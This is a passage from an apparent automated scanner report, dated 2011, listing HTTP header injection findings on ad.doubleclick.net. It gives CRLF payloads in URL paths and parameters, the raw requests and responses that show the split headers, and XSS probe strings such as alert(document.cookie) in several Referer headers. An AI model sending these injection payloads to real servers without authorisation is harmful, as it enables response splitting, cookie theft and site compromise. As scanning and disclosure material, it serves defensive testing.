/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000801877/mnum=0000884206/cstr=1219384=_4dc949b1,2440706181,801877^884206^1183^0,1_/xsxdata=$xsxdata/bnum=1219384/optn=64
Date: Tue, 10 May 2011 14:25:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.18. http://ad.doubleclick.net/adj/N5776.126265.CASALEMEDIA/B5120103.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.126265.CASALEMEDIA/B5120103.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53cb3%0d%0a191ad04e8be was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53cb3%0d%0a191ad04e8be/N5776.126265.CASALEMEDIA/B5120103.7;sz=300x250;click0=http://c.casalemedia.com/c/4/1/84667/;ord=567896543? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/84667/210582/index.html
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53cb3
191ad04e8be
/N5776.126265.CASALEMEDIA/B5120103.7;sz=300x250;click0=http: //c.casalemedia.com/c/4/1/84667/;ord=567896543
Date: Tue, 10 May 2011 14:26:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.19. http://ad.doubleclick.net/adj/contentnext.ilm/paid [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/contentnext.ilm/paid

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78319%0d%0ad567f4b602b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78319%0d%0ad567f4b602b/contentnext.ilm/paid;;tile=2;kw=cs2;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moconews.net/article/419-nfc-in-focus-at-google-io-as-foursquare-hashable-join-party/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78319
d567f4b602b
/contentnext.ilm/paid;;tile=2;kw=cs2;sz=300x250;ord=[timestamp]:
Date: Tue, 10 May 2011 13:39:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.20. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/longpost

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 70fd5%0d%0ae6e9bec567f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /70fd5%0d%0ae6e9bec567f/huffpost.politics/longpost;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=mid_article;u=300x250%7Cbpage%7Cmid_article%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=300x250;tile=3;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/70fd5
e6e9bec567f
/huffpost.politics/longpost;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-caro:
Date: Tue, 10 May 2011 13:21:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.21. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8c28c%0d%0a2dc2a43a1fe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8c28c%0d%0a2dc2a43a1fe/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=right_rail_flex;u=300x250,300x600%7Cbpage%7Cright_rail_flex%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=300x250,300x600;tile=5;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8c28c
2dc2a43a1fe
/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina:
Date: Tue, 10 May 2011 13:27:13 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.22. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news/curtain

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79d28%0d%0ae5080b05c95 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /79d28%0d%0ae5080b05c95/huffpost.politics/news/curtain;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=curtain;dcopt=ist;u=938x200%7Cbpage%7Ccurtain%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=938x200;tile=2;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/79d28
e5080b05c95
/huffpost.politics/news/curtain;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-:
Date: Tue, 10 May 2011 13:20:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.23. http://ad.doubleclick.net/adj/ns.androidcentral/general/archive [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ns.androidcentral/general/archive

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 61eab%0d%0a1560136f95c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /61eab%0d%0a1560136f95c/ns.androidcentral/general/archive;net=ns;u=,ns-13398115_1305033285,11f8f328940989e,itbusmb,dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;ord=2250960881356150? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.androidcentral.com/android-central-google-io-2011
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/61eab
1560136f95c
/ns.androidcentral/general/archive;net=ns;u=,ns-13398115_1305033285,11f8f328940989e,itbusmb,dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1;;ppos=btf;kw=;tile=2;cmw=owl;sz=300x250,336x280;net=ns;ord1=505344;contx=itbusmb;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=m:
Date: Tue, 10 May 2011 13:40:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.24. http://ad.doubleclick.net/adj/ph.admin/adsense [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.admin/adsense

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4b413%0d%0acbd46c173ef was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4b413%0d%0acbd46c173ef/ph.admin/adsense;!category=register;type=admin;dcopt=ist;pos=google;tile=11;sz=728x90;ord=1305037222218? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4b413
cbd46c173ef
/ph.admin/adsense;!category=register;type=admin;dcopt=ist;pos=google;tile=11;sz=728x90;ord=1305037222218:
Date: Tue, 10 May 2011 14:26:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.25. http://ad.doubleclick.net/adj/ph.admin/register [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.admin/register

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9ddc8%0d%0ab62af171f16 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9ddc8%0d%0ab62af171f16/ph.admin/register;!category=register;type=admin;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037222218? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9ddc8
b62af171f16
/ph.admin/register;!category=register;type=admin;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037222218:
Date: Tue, 10 May 2011 14:24:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.26. http://ad.doubleclick.net/adj/ph.mobile/adsense [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.mobile/adsense

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 88b02%0d%0a89b56735fc8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /88b02%0d%0a89b56735fc8/ph.mobile/adsense;!category=mobile;type=primary;dcopt=ist;pos=google;tile=12;sz=728x90;ord=1305037226014? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/mobile/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/88b02
89b56735fc8
/ph.mobile/adsense;!category=mobile;type=primary;dcopt=ist;pos=google;tile=12;sz=728x90;ord=1305037226014:
Date: Tue, 10 May 2011 14:25:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.27. http://ad.doubleclick.net/adj/ph.news/adsense [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.news/adsense

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 382f5%0d%0a8a070142022 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /382f5%0d%0a8a070142022/ph.news/adsense;!category=nation_world;art=inq;type=article;dcopt=ist;pos=google;tile=1;sz=300x250;ord=1305037179578? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/382f5
8a070142022
/ph.news/adsense;!category=nation_world;art=inq;type=article;dcopt=ist;pos=google;tile=1;sz=300x250;ord=1305037179578:
Date: Tue, 10 May 2011 14:21:45 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.28. http://ad.doubleclick.net/adj/ph.news/nation_world [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ph.news/nation_world

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 200d0%0d%0aa3dc10f3324 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /200d0%0d%0aa3dc10f3324/ph.news/nation_world;!category=nation_world;art=inq;type=article;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037179578? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/200d0
a3dc10f3324
/ph.news/nation_world;!category=nation_world;art=inq;type=article;dcopt=ist;pos=leader;tile=1;sz=728x90;ord=1305037179578:
Date: Tue, 10 May 2011 14:21:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.29. http://ad.doubleclick.net/adj/q1.philly/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/q1.philly/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78e48%0d%0af7cf34ba712 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78e48%0d%0af7cf34ba712/q1.philly/news;net=q1;u=,q1-53142949_1305033112,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=300x600;net=q1;ord1=158490;contx=polit;dc=w;btg=q1.polit_h;btg=q1.none_h;btg=q1.ent_h;btg=q1.food_h;btg=q1.sports_h;btg=dx.16;btg=dx.23;btg=dx.17;btg=mm.ag1;btg=mm.ak1;btg=mm.am1;btg=mm.aq1;btg=cm.ent_h;btg=cm.music_h;btg=cm.weath_h;btg=cm.sports_h;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78e48
f7cf34ba712
/q1.philly/news;net=q1;u=,q1-53142949_1305033112,11f8f328940989e,polit,q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h-cm.sports_h;;sz=300x600;net=q1;ord1=158490;contx=polit;dc=w;btg=q1.polit_h;btg=q1:
Date: Tue, 10 May 2011 13:14:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.30. http://ad.doubleclick.net/adj/zdgeek.dart/geek-cetera [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/zdgeek.dart/geek-cetera

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9dcfe%0d%0aba92f5cd663 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9dcfe%0d%0aba92f5cd663/zdgeek.dart/geek-cetera;pos=top;dcopt=ist;!category=geek-cetera;sz=160x600;tile=1;ord=6872733993620893? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.geek.com/articles/geek-pick/63398--%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E7861d958a55/
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9dcfe
ba92f5cd663
/zdgeek.dart/geek-cetera;pos=top;dcopt=ist;!category=geek-cetera;sz=160x600;tile=1;ord=6872733993620893:
Date: Tue, 10 May 2011 14:17:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.31. http://ad.doubleclick.net/pfadx/philly_cim/ [dcove parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/philly_cim/

Issue detail

The value of the dcove request parameter is copied into the DCLK_imp response header. The payload 934c2%0d%0a447bd9706e7 was submitted in the dcove parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/philly_cim/;dcove=934c2%0d%0a447bd9706e7 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 10 May 2011 14:21:11 GMT
Expires: Tue, 10 May 2011 14:21:11 GMT
DCLK_imp: v7;x;44306;0-0;0;55848032;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;dcove=934c2
447bd9706e7
;~cs=s:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b03/0/0/%2a/r;44306;0-0;0;55848032;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=1 al
...[SNIP]...

3.32. http://ad.doubleclick.net/pfadx/philly_cim/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/philly_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 6e37b%0d%0afb30a1b7521 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/philly_cim/;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;sz=24x24;dcmt=text/html;ord=1305033093514?&6e37b%0d%0afb30a1b7521=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
